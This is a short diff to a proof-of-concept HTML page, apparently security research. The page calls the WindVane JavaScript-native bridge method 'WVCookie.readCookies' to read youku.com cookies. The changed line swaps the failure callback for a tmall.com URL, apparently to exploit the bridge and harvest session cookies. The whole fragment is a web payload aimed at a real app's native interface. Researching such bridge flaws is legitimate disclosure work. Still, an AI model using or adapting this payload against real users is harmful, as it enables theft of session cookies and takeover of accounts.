--- a/video/poc.html
+++ b/video/poc.html
@@ -70,7 +70,7 @@
       var cookie_params = {
         url: "www.youku.com"
       };
-      window.__windvane__.nativeCall('WVCookie.readCookies', JSON.stringify(cookie_params), "successCallback", "failureCallback");
+      window.__windvane__.nativeCall('WVCookie.readCookies', JSON.stringify(cookie_params), "successCallback", "https://equity.tmall.com");
     });
 
 
